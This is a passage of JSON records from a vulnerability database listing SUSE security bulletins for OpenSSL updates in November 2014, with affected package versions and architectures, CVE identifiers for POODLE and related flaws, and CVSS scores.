"libopenssl0_9_8-hmac", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "libopenssl0_9_8-hmac-0.9.8j-0.66.1.ia64.rpm", "packageName": "libopenssl0_9_8-hmac", "arch": "ia64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "openssl-0.9.8j-0.66.1.i586.rpm", "packageName": "openssl", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "libopenssl0_9_8-0.9.8j-0.66.1.i586.rpm", "packageName": "libopenssl0_9_8", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "openssl-0.9.8j-0.66.1.ia64.rpm", "packageName": "openssl", "arch": "ia64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "libopenssl0_9_8-32bit-0.9.8j-0.66.1.s390x.rpm", "packageName": "libopenssl0_9_8-32bit", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "libopenssl-devel-0.9.8j-0.66.1.x86_64.rpm", "packageName": "libopenssl-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "openssl-doc-0.9.8j-0.66.1.ia64.rpm", "packageName": "openssl-doc", "arch": "ia64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "libopenssl0_9_8-32bit-0.9.8j-0.66.1.x86_64.rpm", "packageName": "libopenssl0_9_8-32bit", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "libopenssl0_9_8-0.9.8j-0.66.1.i586.rpm", "packageName": "libopenssl0_9_8", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "libopenssl0_9_8-32bit-0.9.8j-0.66.1.ppc64.rpm", "packageName": "libopenssl0_9_8-32bit", "arch": "ppc64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "libopenssl-devel-0.9.8j-0.66.1.ia64.rpm", "packageName": "libopenssl-devel", "arch": "ia64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "libopenssl0_9_8-0.9.8j-0.66.1.x86_64.rpm", "packageName": "libopenssl0_9_8", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "libopenssl0_9_8-hmac-0.9.8j-0.66.1.ppc64.rpm", "packageName": "libopenssl0_9_8-hmac", "arch": "ppc64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "libopenssl-devel-0.9.8j-0.66.1.ppc64.rpm", "packageName": "libopenssl-devel", "arch": "ppc64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "libopenssl0_9_8-0.9.8j-0.66.1.x86_64.rpm", "packageName": "libopenssl0_9_8", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "openssl-0.9.8j-0.66.1.x86_64.rpm", "packageName": "openssl", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "libopenssl0_9_8-0.9.8j-0.66.1.ppc64.rpm", "packageName": "libopenssl0_9_8", "arch": "ppc64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "libopenssl-devel-0.9.8j-0.66.1.s390x.rpm", "packageName": "libopenssl-devel", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "openssl-0.9.8j-0.66.1.s390x.rpm", "packageName": "openssl", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "libopenssl0_9_8-hmac-32bit-0.9.8j-0.66.1.x86_64.rpm", "packageName": "libopenssl0_9_8-hmac-32bit", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "openssl-doc-0.9.8j-0.66.1.ppc64.rpm", "packageName": "openssl-doc", "arch": "ppc64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "libopenssl0_9_8-hmac-0.9.8j-0.66.1.i586.rpm", "packageName": "libopenssl0_9_8-hmac", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "libopenssl0_9_8-32bit-0.9.8j-0.66.1.x86_64.rpm", "packageName": "libopenssl0_9_8-32bit", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "openssl-0.9.8j-0.66.1.x86_64.rpm", "packageName": "openssl", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "libopenssl0_9_8-hmac-32bit-0.9.8j-0.66.1.s390x.rpm", "packageName": "libopenssl0_9_8-hmac-32bit", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "libopenssl0_9_8-hmac-0.9.8j-0.66.1.s390x.rpm", "packageName": "libopenssl0_9_8-hmac", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "openssl-doc-0.9.8j-0.66.1.x86_64.rpm", "packageName": "openssl-doc", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "libopenssl0_9_8-0.9.8j-0.66.1.i586.rpm", "packageName": "libopenssl0_9_8", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.3", "packageVersion": "0.9.8j-0.66.1", "packageFilename": "openssl-doc-0.9.8j-0.66.1.i586.rpm", "packageName": "openssl-doc", "arch": "i586", "operator": "lt"}], "description": "This OpenSSL update fixes the following issues:\n\n * Session Ticket Memory Leak (CVE-2014-3567)\n * Build option no-ssl3 is incomplete (CVE-2014-3568)\n * Add support for TLS_FALLBACK_SCSV to mitigate CVE-2014-3566 (POODLE)\n\n Security Issues:\n\n * CVE-2014-3567\n &lt;<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3567\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3567</a>&gt;\n * CVE-2014-3566\n &lt;<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566</a>&gt;\n * CVE-2014-3568\n &lt;<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3568\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3568</a>&gt;\n", "edition": 1, "reporter": "Suse", "published": "2014-11-05T23:04:47", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "Security update for OpenSSL (important)", "type": "suse", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3566", "CVE-2014-3567", "CVE-2014-3568"], "modified": "2014-11-05T23:04:47", "id": "SUSE-SU-2014:1361-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-11/msg00003.html", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:42:58", "references": ["https://bugzilla.suse.com/show_bug.cgi?id=901223", "http://download.suse.com/patch/finder/?keywords=ea1bce59a09645696e580ca407c8cb20", "https://bugzilla.suse.com/show_bug.cgi?id=901277"], "affectedPackage": [{"OS": "SUSE Manager 1.7 for SLE", "OSVersion": "11.2", "packageVersion": "0.9.8j-0.66.1", "arch": "x86_64", "packageFilename": "libopenssl0_9_8-32bit-0.9.8j-0.66.1.x86_64.rpm", "packageName": "libopenssl0_9_8-32bit", "operator": "lt"}, {"OS": "SUSE Manager 1.7 for SLE", "OSVersion": "11.2", "packageVersion": "0.9.8j-0.66.1", "arch": "x86_64", "packageFilename": "libopenssl0_9_8-hmac-32bit-0.9.8j-0.66.1.x86_64.rpm", "packageName": "libopenssl0_9_8-hmac-32bit", "operator": "lt"}, {"OS": "SUSE Manager 1.7 for SLE", "OSVersion": "11.2", "packageVersion": "0.9.8j-0.66.1", "arch": "x86_64", "packageFilename": "openssl-0.9.8j-0.66.1.x86_64.rpm", "packageName": "openssl", "operator": "lt"}, {"OS": "SUSE Manager 1.7 for SLE", "OSVersion": "11.2", "packageVersion": "0.9.8j-0.66.1", "arch": "x86_64", "packageFilename": "openssl-doc-0.9.8j-0.66.1.x86_64.rpm", "packageName": "openssl-doc", "operator": "lt"}, {"OS": "SUSE Manager 1.7 for SLE", "OSVersion": "11.2", "packageVersion": "0.9.8j-0.66.1", "arch": "x86_64", "packageFilename": "libopenssl0_9_8-hmac-0.9.8j-0.66.1.x86_64.rpm", "packageName": "libopenssl0_9_8-hmac", "operator": "lt"}, {"OS": "SUSE Manager 1.7 for SLE", "OSVersion": "11.2", "packageVersion": "0.9.8j-0.66.1", "arch": "x86_64", "packageFilename": "libopenssl0_9_8-0.9.8j-0.66.1.x86_64.rpm", "packageName": "libopenssl0_9_8", "operator": "lt"}, {"OS": "SUSE Studio Onsite", "OSVersion": "1.3", "packageVersion": "0.9.8j-0.66.1", "arch": "x86_64", "packageFilename": "libopenssl-devel-0.9.8j-0.66.1.x86_64.rpm", "packageName": "libopenssl-devel", "operator": "lt"}], "description": "This OpenSSL update fixes the following issues:\n\n * Session Ticket Memory Leak (CVE-2014-3567)\n * Build option no-ssl3 is incomplete (CVE-2014-3568)\n * Add support for TLS_FALLBACK_SCSV to mitigate CVE-2014-3566 (POODLE)\n\n Security Issues:\n\n * CVE-2014-3567\n &lt;<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3567\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3567</a>&gt;\n * CVE-2014-3566\n &lt;<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566</a>&gt;\n * CVE-2014-3568\n &lt;<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3568\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3568</a>&gt;\n", "edition": 1, "reporter": "Suse", "published": "2014-11-13T01:04:46", "title": "Security update for OpenSSL (important)", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "suse", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3566", "CVE-2014-3567", "CVE-2014-3568"], "modified": "2014-11-13T01:04:46", "id": "SUSE-SU-2014:1387-2", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-11/msg00012.html", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:50:20", "references": ["https://bugzilla.suse.com/show_bug.cgi?id=901223", "http://download.suse.com/patch/finder/?keywords=842997f20dc51405dbd07abdc8071460", "https://bugzilla.suse.com/show_bug.cgi?id=892403", "https://bugzilla.suse.com/show_bug.cgi?id=901277", "http://download.suse.com/patch/finder/?keywords=8b3e46d68e087bc1f9f9870abd2b6d0d"], "affectedPackage": [{"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "0.9.8j-0.66.1", "arch": "s390x", "packageFilename": "libopenssl0_9_8-hmac-0.9.8j-0.66.1.s390x.rpm", "packageName": "libopenssl0_9_8-hmac", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "0.9.8j-0.66.1", "arch": "s390x", "packageFilename": "libopenssl-devel-0.9.8j-0.66.1.s390x.rpm", "packageName": "libopenssl-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "0.9.8j-0.66.1", "arch": "x86_64", "packageFilename": "openssl-0.9.8j-0.66.1.x86_64.rpm", "packageName": "openssl", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "0.9.8j-0.66.1", "arch": "s390x", "packageFilename": "libopenssl0_9_8-hmac-0.9.8j-0.66.1.s390x.rpm", "packageName": "libopenssl0_9_8-hmac", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "0.9.8j-0.66.1", "arch": "i586", "packageFilename": "openssl-0.9.8j-0.66.1.i586.rpm", "packageName": "openssl", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "0.9.8j-0.66.1", "arch": "x86_64", "packageFilename": "libopenssl0_9_8-hmac-0.9.8j-0.66.1.x86_64.rpm", "packageName": "libopenssl0_9_8-hmac", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "0.9.8j-0.66.1", "arch": "i586", "packageFilename": "libopenssl0_9_8-hmac-0.9.8j-0.66.1.i586.rpm", "packageName": "libopenssl0_9_8-hmac", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "0.9.8j-0.66.1", "arch": "s390x", "packageFilename": "openssl-doc-0.9.8j-0.66.1.s390x.rpm", "packageName": "openssl-doc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "0.9.8j-0.66.1", "arch": "s390x", "packageFilename": "libopenssl0_9_8-0.9.8j-0.66.1.s390x.rpm", "packageName": "libopenssl0_9_8", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "0.9.8j-0.66.1", "arch": "s390x", "packageFilename": "libopenssl-devel-0.9.8j-0.66.1.s390x.rpm", "packageName": "libopenssl-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "0.9.8j-0.66.1", "arch": "x86_64", "packageFilename": "libopenssl0_9_8-hmac-32bit-0.9.8j-0.66.1.x86_64.rpm", "packageName": "libopenssl0_9_8-hmac-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "0.9.8j-0.66.1", "arch": "s390x", "packageFilename": "openssl-0.9.8j-0.66.1.s390x.rpm", "packageName": "openssl", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "0.9.8j-0.66.1", "arch": "i586", "packageFilename": "libopenssl0_9_8-0.9.8j-0.66.1.i586.rpm", "packageName": "libopenssl0_9_8", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "0.9.8j-0.66.1", "arch": "i586", "packageFilename": "libopenssl-devel-0.9.8j-0.66.1.i586.rpm", "packageName": "libopenssl-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "0.9.8j-0.66.1", "arch": "i586", "packageFilename": "openssl-doc-0.9.8j-0.66.1.i586.rpm", "packageName": "openssl-doc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "0.9.8j-0.66.1", "arch": "s390x", "packageFilename": "openssl-doc-0.9.8j-0.66.1.s390x.rpm", "packageName": "openssl-doc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "0.9.8j-0.66.1", "arch": "x86_64", "packageFilename": "openssl-doc-0.9.8j-0.66.1.x86_64.rpm", "packageName": "openssl-doc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "0.9.8j-0.66.1", "arch": "i586", "packageFilename": "libopenssl0_9_8-hmac-0.9.8j-0.66.1.i586.rpm", "packageName": "libopenssl0_9_8-hmac", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "0.9.8j-0.66.1", "arch": "i586", "packageFilename": "libopenssl0_9_8-0.9.8j-0.66.1.i586.rpm", "packageName": "libopenssl0_9_8", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "0.9.8j-0.66.1", "arch": "i586", "packageFilename": "openssl-doc-0.9.8j-0.66.1.i586.rpm", "packageName": "openssl-doc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "0.9.8j-0.66.1", "arch": "x86_64", "packageFilename": "libopenssl-devel-0.9.8j-0.66.1.x86_64.rpm", "packageName": "libopenssl-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "0.9.8j-0.66.1", "arch": "i586", "packageFilename": "libopenssl-devel-0.9.8j-0.66.1.i586.rpm", "packageName": "libopenssl-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "0.9.8j-0.66.1", "arch": "x86_64", "packageFilename": "libopenssl0_9_8-32bit-0.9.8j-0.66.1.x86_64.rpm", "packageName": "libopenssl0_9_8-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "0.9.8j-0.66.1", "arch": "x86_64", "packageFilename": "libopenssl0_9_8-32bit-0.9.8j-0.66.1.x86_64.rpm", "packageName": "libopenssl0_9_8-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "0.9.8j-0.66.1", "arch": "x86_64", "packageFilename": "libopenssl0_9_8-hmac-32bit-0.9.8j-0.66.1.x86_64.rpm", "packageName": "libopenssl0_9_8-hmac-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "0.9.8j-0.66.1", "arch": "s390x", "packageFilename": "libopenssl0_9_8-hmac-32bit-0.9.8j-0.66.1.s390x.rpm", "packageName": "libopenssl0_9_8-hmac-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "0.9.8j-0.66.1", "arch": "x86_64", "packageFilename": "libopenssl0_9_8-0.9.8j-0.66.1.x86_64.rpm", "packageName": "libopenssl0_9_8", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "0.9.8j-0.66.1", "arch": "x86_64", "packageFilename": "libopenssl0_9_8-hmac-0.9.8j-0.66.1.x86_64.rpm", "packageName": "libopenssl0_9_8-hmac", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "0.9.8j-0.66.1", "arch": "s390x", "packageFilename": "libopenssl0_9_8-hmac-32bit-0.9.8j-0.66.1.s390x.rpm", "packageName": "libopenssl0_9_8-hmac-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "0.9.8j-0.66.1", "arch": "s390x", "packageFilename": "libopenssl0_9_8-0.9.8j-0.66.1.s390x.rpm", "packageName": "libopenssl0_9_8", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "0.9.8j-0.66.1", "arch": "x86_64", "packageFilename": "libopenssl0_9_8-0.9.8j-0.66.1.x86_64.rpm", "packageName": "libopenssl0_9_8", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "0.9.8j-0.66.1", "arch": "s390x", "packageFilename": "openssl-0.9.8j-0.66.1.s390x.rpm", "packageName": "openssl", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "0.9.8j-0.66.1", "arch": "i586", "packageFilename": "openssl-0.9.8j-0.66.1.i586.rpm", "packageName": "openssl", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "0.9.8j-0.66.1", "arch": "s390x", "packageFilename": "libopenssl0_9_8-32bit-0.9.8j-0.66.1.s390x.rpm", "packageName": "libopenssl0_9_8-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "0.9.8j-0.66.1", "arch": "x86_64", "packageFilename": "openssl-0.9.8j-0.66.1.x86_64.rpm", "packageName": "openssl", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "0.9.8j-0.66.1", "arch": "s390x", "packageFilename": "libopenssl0_9_8-32bit-0.9.8j-0.66.1.s390x.rpm", "packageName": "libopenssl0_9_8-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "0.9.8j-0.66.1", "arch": "x86_64", "packageFilename": "libopenssl-devel-0.9.8j-0.66.1.x86_64.rpm", "packageName": "libopenssl-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "0.9.8j-0.66.1", "arch": "x86_64", "packageFilename": "openssl-doc-0.9.8j-0.66.1.x86_64.rpm", "packageName": "openssl-doc", "operator": "lt"}], "description": "This OpenSSL update fixes the following issues:\n\n * Session Ticket Memory Leak (CVE-2014-3567)\n * Build option no-ssl3 is incomplete ((CVE-2014-3568)\n * Add support for TLS_FALLBACK_SCSV to mitigate CVE-2014-3566 (POODLE)\n\n Security Issues:\n\n * CVE-2014-3513\n &lt;<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3513\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3513</a>&gt;\n * CVE-2014-3567\n &lt;<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3567\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3567</a>&gt;\n * CVE-2014-3566\n &lt;<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566</a>&gt;\n * CVE-2014-3568\n &lt;<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3568\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3568</a>&gt;\n", "edition": 1, "reporter": "Suse", "published": "2014-11-11T00:05:06", "title": "Security update for OpenSSL (important)", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "suse", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3566", "CVE-2014-3513", "CVE-2014-3567", "CVE-2014-3568"], "modified": "2014-11-11T00:05:06", "id": "SUSE-SU-2014:1386-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-11/msg00006.html", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:46:54", "references": ["https://bugzilla.suse.com/show_bug.cgi?id=901223", "http://download.suse.com/patch/finder/?keywords=b73f6fe02c4bdbb47052a845f36d3df3", "https://bugzilla.suse.com/show_bug.cgi?id=901277"], "affectedPackage": [{"OS": "SUSE Linux Enterprise Security Module", "OSVersion": "11.3", "packageVersion": "1.0.1g-0.22.1", "packageName": "libopenssl1_0_0-32bit", "packageFilename": "libopenssl1_0_0-32bit-1.0.1g-0.22.1.ppc64.rpm", "arch": "ppc64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Security Module", "OSVersion": "11.3", "packageVersion": "1.0.1g-0.22.1", "packageName": "libopenssl1-devel", "packageFilename": "libopenssl1-devel-1.0.1g-0.22.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Security Module", "OSVersion": "11.3", "packageVersion": "1.0.1g-0.22.1", "packageName": "openssl1-doc", "packageFilename": "openssl1-doc-1.0.1g-0.22.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Security Module", "OSVersion": "11.3", "packageVersion": "1.0.1g-0.22.1", "packageName": "openssl1-doc", "packageFilename": "openssl1-doc-1.0.1g-0.22.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Security Module", "OSVersion": "11.3", "packageVersion": "1.0.1g-0.22.1", "packageName": "openssl1-doc", "packageFilename": "openssl1-doc-1.0.1g-0.22.1.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Security Module", "OSVersion": "11.3", "packageVersion": "1.0.1g-0.22.1", "packageName": "openssl1", "packageFilename": "openssl1-1.0.1g-0.22.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Security Module", "OSVersion": "11.3", "packageVersion": "1.0.1g-0.22.1", "packageName": "libopenssl1_0_0", "packageFilename": "libopenssl1_0_0-1.0.1g-0.22.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Security Module", "OSVersion": "11.3", "packageVersion": "1.0.1g-0.22.1", "packageName": "openssl1", "packageFilename": "openssl1-1.0.1g-0.22.1.ppc64.rpm", "arch": "ppc64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Security Module", "OSVersion": "11.3", "packageVersion": "1.0.1g-0.22.1", "packageName": "openssl1", "packageFilename": "openssl1-1.0.1g-0.22.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Security Module", "OSVersion": "11.3", "packageVersion": "1.0.1g-0.22.1", "packageName": "openssl1", "packageFilename": "openssl1-1.0.1g-0.22.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Security Module", "OSVersion": "11.3", "packageVersion": "1.0.1g-0.22.1", "packageName": "libopenssl1_0_0", "packageFilename": "libopenssl1_0_0-1.0.1g-0.22.1.ppc64.rpm", "arch": "ppc64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Security Module", "OSVersion": "11.3", "packageVersion": "1.0.1g-0.22.1", "packageName": "libopenssl1_0_0-32bit", "packageFilename": "libopenssl1_0_0-32bit-1.0.1g-0.22.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Security Module", "OSVersion": "11.3", "packageVersion": "1.0.1g-0.22.1", "packageName": "openssl1", "packageFilename": "openssl1-1.0.1g-0.22.1.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Security Module", "OSVersion": "11.3", "packageVersion": "1.0.1g-0.22.1", "packageName": "libopenssl1_0_0", "packageFilename": "libopenssl1_0_0-1.0.1g-0.22.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Security Module", "OSVersion": "11.3", "packageVersion": "1.0.1g-0.22.1", "packageName": "libopenssl1-devel", "packageFilename": "libopenssl1-devel-1.0.1g-0.22.1.ppc64.rpm", "arch": "ppc64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Security Module", "OSVersion": "11.3", "packageVersion": "1.0.1g-0.22.1", "packageName": "libopenssl1_0_0-x86", "packageFilename": "libopenssl1_0_0-x86-1.0.1g-0.22.1.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Security Module", "OSVersion": "11.3", "packageVersion": "1.0.1g-0.22.1", "packageName": "openssl1-doc", "packageFilename": "openssl1-doc-1.0.1g-0.22.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": 